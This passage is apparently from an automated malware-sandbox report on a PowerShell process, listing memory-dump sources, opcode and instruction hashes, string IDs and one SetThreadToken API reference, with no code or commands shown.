                                                          • Opcode Fuzzy Hash: a8c301b2aab11894e1b9082654a004576cf91ea531ddb93b0bc65c186af20a8d
                                                          • Instruction Fuzzy Hash: 90912074F007189BEB19EFB9851066EBBE3EF84700B40892DE516AB344DF74AE058BD5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1332767140.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$tPq$tPq$tPq$tPq$tPq$tPq$$q$$q$$q
                                                          • API String ID: 0-2170552499
                                                          • Opcode ID: bc40d1a04159a7513e98d0cab53582ded8a99ba0012d68a3646ffae6ee6e4158
                                                          • Instruction ID: a9597e5e3967e35e0323fdec9f9e20b37476cda4170c7bc7a41b75487ac4cc78
                                                          • Opcode Fuzzy Hash: bc40d1a04159a7513e98d0cab53582ded8a99ba0012d68a3646ffae6ee6e4158
                                                          • Instruction Fuzzy Hash: D0C259F1B0430A9FDB258F6998047AABBE1BF95325F14807ADD05CB292DF31D845C7A2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph (rendered graph data, collapsed here): function entry 7853ce8, basic blocks spanning 7853ce8-78543ea, graph nodes 483-646, no call edges
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1332767140.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'q$4'q$4'q$4'q
                                                          • API String ID: 0-4210068417
                                                          • Opcode ID: eba60d4918a7157454d5edc745f2de42316d5ba390f24f0180a77746baf852c3
                                                          • Instruction ID: 090fbeab4da40a5b6e9fb12526ebb9ac28b4f653031e14413ff326f6bbd419bf
                                                          • Opcode Fuzzy Hash: eba60d4918a7157454d5edc745f2de42316d5ba390f24f0180a77746baf852c3
                                                          • Instruction Fuzzy Hash: 7D129FB1B043569FDB258F6894107BABBA29FD5255F14807BCD09CF641DB32DC81C7A2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph
                                                          APIs
                                                          • SetThreadToken.KERNELBASE(?), ref: 08A466B2
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1336212223.0000000008A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_8a40000_powershell.jbxd
                                                          Similarity
                                                          • API ID: ThreadToken
                                                          • String ID:
                                                          • API String ID: 3254676861-0
                                                          • Opcode ID: 300de38d187a76fd82502e6a351d4c25c447d199e84ebd449f61e619da82ec13
                                                          • Instruction ID: b8a5925ca4ddf2d85eb6b6c946b99fdd1018b5ef1bb28d0943110b49c31276dc
                                                          • Opcode Fuzzy Hash: 300de38d187a76fd82502e6a351d4c25c447d199e84ebd449f61e619da82ec13
                                                          • Instruction Fuzzy Hash: 201167B1D003488FEB20DF9AC445B9EFFF4EB89224F14881AD119A7250C674A945CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph
                                                          APIs
                                                          • SetThreadToken.KERNELBASE(?), ref: 08A466B2
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1336212223.0000000008A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_8a40000_powershell.jbxd
                                                          Similarity
                                                          • API ID: ThreadToken
                                                          • String ID:
                                                          • API String ID: 3254676861-0
                                                          • Opcode ID: 885a6132a4924837a3bc5b0fcc2ceda49a8d71ceed97b14f57390d2ccbb5e09f
                                                          • Instruction ID: 59c47756ba57eb0d541a0fd3b85e15dbfef085fefc73d4b66674bafe28f1711a
                                                          • Opcode Fuzzy Hash: 885a6132a4924837a3bc5b0fcc2ceda49a8d71ceed97b14f57390d2ccbb5e09f
                                                          • Instruction Fuzzy Hash: 8A1136B5D003088FDB20DF9AC845B9EFBF8EB89324F14841AD519A7350C774A945CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (q
                                                          • API String ID: 0-2414175341
                                                          • Opcode ID: ab4c40ce076efc97a30c768daf6dbcd912922ec5d6f0d44bc11b110cab7a03bd
                                                          • Instruction ID: a3e26850ab4394f7bc5eada913b181f292943dc97ade69df79973b833e7e8802
                                                          • Opcode Fuzzy Hash: ab4c40ce076efc97a30c768daf6dbcd912922ec5d6f0d44bc11b110cab7a03bd
                                                          • Instruction Fuzzy Hash: F5412C34B042048FDB14DFA8C854AADBBF6EB8D615F2454A8E406EB391DB35EC01CB65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (&q
                                                          • API String ID: 0-583763264
                                                          • Opcode ID: 7160912858f13e2060afcbd3781e4cfaf7553f3142c92b6ccb986acf2d905ce6
                                                          • Instruction ID: 8347431f41258ca5be8a9a74c0cf51e53f07d6cfa70ab1ec7738086419e407ba
                                                          • Opcode Fuzzy Hash: 7160912858f13e2060afcbd3781e4cfaf7553f3142c92b6ccb986acf2d905ce6
                                                          • Instruction Fuzzy Hash: 3721E275E043088FCB25EFAED400B9EBBF5EB89320F14846ED418E7340CA74A9458BA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4eeec31b6812458981656eee455d86f22a6a9a98a8f287c068dee4f30f1e7052
                                                          • Instruction ID: e38c755b47d2dfa72af22142b73e039fbecd76c20d5bf276212009e0bc9a0691
                                                          • Opcode Fuzzy Hash: 4eeec31b6812458981656eee455d86f22a6a9a98a8f287c068dee4f30f1e7052
                                                          • Instruction Fuzzy Hash: E0914B34F002189FDB24EF69D450A6DBBE6AF88610B15457DE806EB355DF71EC02CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 81b81bb2a828d9e1744bd55da0753fa2514dbbc54bfa6a04b84dfe4aa5463a6e
                                                          • Instruction ID: d0c59557935219145b2caa13b79eb238e4934c24c230b472c84733b84e980e25
                                                          • Opcode Fuzzy Hash: 81b81bb2a828d9e1744bd55da0753fa2514dbbc54bfa6a04b84dfe4aa5463a6e
                                                          • Instruction Fuzzy Hash: AD915E74A006059FCB15DF5CC494AAEFBB1FF89310B2485A9E815AB3A5C735FC51CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1be335828da2ec532cbc1719a24e8dcfea1a2db34a473b0a10db5f5143decd7b
                                                          • Instruction ID: 47ea83a1a5f8c18ca398e6cfcda0cab711b330fda91916380dc393d7c10678a3
                                                          • Opcode Fuzzy Hash: 1be335828da2ec532cbc1719a24e8dcfea1a2db34a473b0a10db5f5143decd7b
                                                          • Instruction Fuzzy Hash: A251BE347042099FE714EBA9DC84A6ABBEAEBC9214B2545BDE509CB351EB31EC01C790
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5d548ed09dae02cf88fcdbd84a0f12da83a1465f18c4697d3fe844bf8848944e
                                                          • Instruction ID: 0937d15b60b603356bf816a5fe7f440e8be84580108b22e33c35cb7c76213924
                                                          • Opcode Fuzzy Hash: 5d548ed09dae02cf88fcdbd84a0f12da83a1465f18c4697d3fe844bf8848944e
                                                          • Instruction Fuzzy Hash: D0611571E00208DFDB14DFA9D584B9DBBF6EF98310F18816AE819AB354EB34AC45CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 82915888e9afb94217a5837492db84a1d0072ed783f73b73a0d8e23bd6266a61
                                                          • Instruction ID: 8c4ff3166ae6a7113951089027649a678550041e2f682fce8b84f0bf308b3a38
                                                          • Opcode Fuzzy Hash: 82915888e9afb94217a5837492db84a1d0072ed783f73b73a0d8e23bd6266a61
                                                          • Instruction Fuzzy Hash: 9F512775E00248DFCB14DFA9D584B9DBBF6EF98310F18806AE819AB365DB34AC45CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bff93938ca823a79021c2bf0f390d22aac75ce32dc20ce998c25167812dc3ada
                                                          • Instruction ID: f5e21bb7f09060dec27e6b19fc00e1018e73c819b40a1dfe5de325f8756ef712
                                                          • Opcode Fuzzy Hash: bff93938ca823a79021c2bf0f390d22aac75ce32dc20ce998c25167812dc3ada
                                                          • Instruction Fuzzy Hash: 69414934B003058FDB20EF7CD594A6ABBE6EF8821571585A9E509CF362EB34ED028B51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 88e5c433b040d6eb646de5e2e0d8a9e2a55a9369f362d4d4a7a85f3d6c34bd3d
                                                          • Instruction ID: 8723fdd20aed41520aa085075f4de10b0ca43be15e60cd04fe66b2bf9d9ea519
                                                          • Opcode Fuzzy Hash: 88e5c433b040d6eb646de5e2e0d8a9e2a55a9369f362d4d4a7a85f3d6c34bd3d
                                                          • Instruction Fuzzy Hash: 8B411B34B003058FDB20EF7CD594E6ABBE6EF8821571585A9E509DF351EB34ED028B51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1332767140.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_7850000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 31d41f1f1d77a2af5ec3770ca5d72702cf91c829d9f40984c5942ef42ebe8f57
                                                          • Instruction ID: ccfc813aebd31d11a77b22f1c70ff80aba8395370677be17fe2042c04cf63210
                                                          • Opcode Fuzzy Hash: 31d41f1f1d77a2af5ec3770ca5d72702cf91c829d9f40984c5942ef42ebe8f57
                                                          • Instruction Fuzzy Hash: 9C4128F0A00206DFDB258F18C5147BA7BB2AF9528CF0480A9CD04DFA56D735ED44CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 763c9953973f55c07aaa334c2a99d0169d99347b927a722320a7389b008c8a72
                                                          • Instruction ID: 9c488e2afa823488f12ec4e5b4c7bbfb25d4368d987ac736ea3ecb63745cb949
                                                          • Opcode Fuzzy Hash: 763c9953973f55c07aaa334c2a99d0169d99347b927a722320a7389b008c8a72
                                                          • Instruction Fuzzy Hash: 25418C34A042499FCB11DF78D954A9DBBF2FF89214F1489ADD405EB392CB34AD05CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 17e1e858388d8a6f9eeee2293fa825f03268d2469a6c7ff091216fe7eb3c46dd
                                                          • Instruction ID: 4dc239d9c0bf128266ee72d82de302bb96c02ec8cc80b7b9e52756e2de837024
                                                          • Opcode Fuzzy Hash: 17e1e858388d8a6f9eeee2293fa825f03268d2469a6c7ff091216fe7eb3c46dd
                                                          • Instruction Fuzzy Hash: 0F413774A006059FCB19DF58C598ABAF7B1FF88310B1586A9D815AB364C736FC91CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e8d6423c6df3b0cbad445f142581cf9aef377e41e0d5920a5df09feae54bca63
                                                          • Instruction ID: 8d6ee5f5a607eacd5105c9bc9903a1a6e3100545fd3febeada810cc09cef7f6d
                                                          • Opcode Fuzzy Hash: e8d6423c6df3b0cbad445f142581cf9aef377e41e0d5920a5df09feae54bca63
                                                          • Instruction Fuzzy Hash: EA319E353002048FD715EB78E844B9ABB96EFD4226F00867DE609CF351DF71A84ACBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 268c95f7e0beda26b4edcad7834bcc62ddbf55f137326b2c48fe554387f8db9b
                                                          • Instruction ID: f7f890c1d56fed12aa41c95b22c9df795c5843ddedec37f90d34be9d095deb17
                                                          • Opcode Fuzzy Hash: 268c95f7e0beda26b4edcad7834bcc62ddbf55f137326b2c48fe554387f8db9b
                                                          • Instruction Fuzzy Hash: C7311A34B042058FCB14EFA8C958AAABBF5EB8D715F2454ACE445EB395DB31EC01CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c32e755a1e5bd10cf0af046f32bd98b4897029b53ecfd9cf01e6d0b8ced23fc9
                                                          • Instruction ID: 49e90b77834e04698aa8c795a8eaf5fb3b70bde2064b66b8aca61c951a04f0ff
                                                          • Opcode Fuzzy Hash: c32e755a1e5bd10cf0af046f32bd98b4897029b53ecfd9cf01e6d0b8ced23fc9
                                                          • Instruction Fuzzy Hash: 60315B35A042448FCB15DF68D4646AEBFF2EF8A214F0489A9D442EB392CB35AC85CB55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d65beb6e57caae9bac1250f5042c8bc3c072edd0e57ef777f000e2c33799df94
                                                          • Instruction ID: 5397eaf61deba7a83cc97a019d00c4905d0f27f9930fe14e47bd6315df242b21
                                                          • Opcode Fuzzy Hash: d65beb6e57caae9bac1250f5042c8bc3c072edd0e57ef777f000e2c33799df94
                                                          • Instruction Fuzzy Hash: 5A315870E006098FDB19EFADD494BAEBBF6AF88311F14806EE505EB351EB749C418B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cec70e8a4ed9bbc53d489efb7b1ea961faa65bd1751cf6d0bf80886086ddbd9f
                                                          • Instruction ID: 2a094d7f1225d69a345270e3f5f82f447ea645e5a01d3cad20e2f43d20f56c88
                                                          • Opcode Fuzzy Hash: cec70e8a4ed9bbc53d489efb7b1ea961faa65bd1751cf6d0bf80886086ddbd9f
                                                          • Instruction Fuzzy Hash: 273192B8E003489FEB01EB64E854AAE7BF3EF85300F1184A9D615AF395CA749D45CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6a4a7d1458af358924623d812044e9aae976b3d851dee16179362d68b109e3e3
                                                          • Instruction ID: 8cb06c0dafa21cfa9ac076dcabafc348e59208f48438563c316c373151bf5969
                                                          • Opcode Fuzzy Hash: 6a4a7d1458af358924623d812044e9aae976b3d851dee16179362d68b109e3e3
                                                          • Instruction Fuzzy Hash: 54314970E006098FDB14EF69D4947AEBBF6AF88210F10802AE505EB351EB749C018B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bd5e1bd8a389d064923c1acad26c6e1601d36ce037bfa9c8d6192c5af8103e22
                                                          • Instruction ID: 280eb9fb56427d2b802e5d34a91580a62a73494ee2fa3003c9b3db0b4e1f17ca
                                                          • Opcode Fuzzy Hash: bd5e1bd8a389d064923c1acad26c6e1601d36ce037bfa9c8d6192c5af8103e22
                                                          • Instruction Fuzzy Hash: 34316934A00209DFCB24DF79D994A9EBBF2FF89205F108968D416AB394DB34AD05CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 85de18cc9004d6095c212dbfacc127231b0513bae68736c92713d64b8442cde7
                                                          • Instruction ID: 784622d99a28cefbd64a27d32cd2921aa192a3451c5404005b9e39b009a4f244
                                                          • Opcode Fuzzy Hash: 85de18cc9004d6095c212dbfacc127231b0513bae68736c92713d64b8442cde7
                                                          • Instruction Fuzzy Hash: 70314FB8E002089FEB04EB64E554AAE7BF3EF84300F1084699615AB395DA75AD418F90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 47eed014b62b932f57e3fb0dde587f8787c60a0f1b481f62bc81d825bf2399af
                                                          • Instruction ID: 7358922981104a64dbe7b9f87d33ab324d9b4c53cdc0bf8a36ade636ed8121a9
                                                          • Opcode Fuzzy Hash: 47eed014b62b932f57e3fb0dde587f8787c60a0f1b481f62bc81d825bf2399af
                                                          • Instruction Fuzzy Hash: 56314B34A002048FCB14DF68D46869EBBF6EF89314F04896DD406EB390DF75AC85CB94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325020109.000000000321D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0321D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_321d000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4d7df0b273198cdf26dd1090554019d82913737a370cf677675a20ca7ad83b0a
                                                          • Instruction ID: 67650922673db1eb76999102fd00b4667d497a075ae4d227d74d586bbb08191b
                                                          • Opcode Fuzzy Hash: 4d7df0b273198cdf26dd1090554019d82913737a370cf677675a20ca7ad83b0a
                                                          • Instruction Fuzzy Hash: 8E212975518300EFDB05DF10DBC0B16BBA5FB98314F24C6ADEA090E256C336C4A6DBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7490553d24c721fec19a77f1e2cc7d14802e991561218c77458f351f98750662
                                                          • Instruction ID: ac8d73a5109ea8e1660250ad88ae8376d961b6a12e406e35e8631baa6205f31d
                                                          • Opcode Fuzzy Hash: 7490553d24c721fec19a77f1e2cc7d14802e991561218c77458f351f98750662
                                                          • Instruction Fuzzy Hash: B531ACB49057448EDB60DF7ED08879AFFF6EF88320F28C46DD84D9B215D67464818B61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325020109.000000000321D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0321D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_321d000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 53cf4ec08d821fcfbcbba43c54bcffd318d1287bed70b104fed8c018c0dd2263
                                                          • Instruction ID: 4438032e177af81fcd11bad9c9878db5175492fcdaff96619fa93b84703fd42d
                                                          • Opcode Fuzzy Hash: 53cf4ec08d821fcfbcbba43c54bcffd318d1287bed70b104fed8c018c0dd2263
                                                          • Instruction Fuzzy Hash: 2E213775614300EFDB14DF10DBC0B16BBA5EB94324F24C6ADD81A4B24AC376D496CA61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 83d0d41890ee0cc170fb71188f21318f8ed3b689f0491bdb44badc83855c0b1e
                                                          • Instruction ID: c5b7276fef448560b13f05951f1ac2a25dfc9f1b0f31e64b9a44bdb86889719a
                                                          • Opcode Fuzzy Hash: 83d0d41890ee0cc170fb71188f21318f8ed3b689f0491bdb44badc83855c0b1e
                                                          • Instruction Fuzzy Hash: C7217AB49057448EDB60DF6ED08839AFFF6EB88310F28C42ED85D9B255D77464818B61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 018d6622816efc89923e79550634a5182d32d49229825eb2257b241cbf6c19b6
                                                          • Instruction ID: d40c56a41b0c8aae2ab9cf0bba732acc1a3af2ce182daf39585b677452dd0ca9
                                                          • Opcode Fuzzy Hash: 018d6622816efc89923e79550634a5182d32d49229825eb2257b241cbf6c19b6
                                                          • Instruction Fuzzy Hash: DE11EF39B001148FDB14EBACE940AED77F6EBCC615B1440A9E509DB315DB31ED128BA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325020109.000000000321D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0321D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_321d000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 86abae72bb8b1cff9036b38b87f2b2ab2493ab898db39df918bf320120c6b226
                                                          • Instruction ID: 9d076fd2128966882fdb3165f14bb1e7e9b12648b0e33e7e3b7611ce4f6b2f5b
                                                          • Opcode Fuzzy Hash: 86abae72bb8b1cff9036b38b87f2b2ab2493ab898db39df918bf320120c6b226
                                                          • Instruction Fuzzy Hash: F921AE76504240EFCB06CF10D6C0B15BFB2FB88314F28C6A9D9494A256C33AD466DB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325365383.0000000004980000.00000040.00000800.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4980000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2ed1538688a105adca5f678b77b95a6b18e0bc5ca8a18b288828ff1d94c982b7
                                                          • Instruction ID: cc995d2d04b0bb68f7c453467f06226089f7252f15a679ebe2e7207a94a360b9
                                                          • Opcode Fuzzy Hash: 2ed1538688a105adca5f678b77b95a6b18e0bc5ca8a18b288828ff1d94c982b7
                                                          • Instruction Fuzzy Hash: 6711A03590D3905FDB03DF68D8605E9BF71EF8A220B0981D7D4909F2A3C226990AC7A5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1325020109.000000000321D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0321D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_321d000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
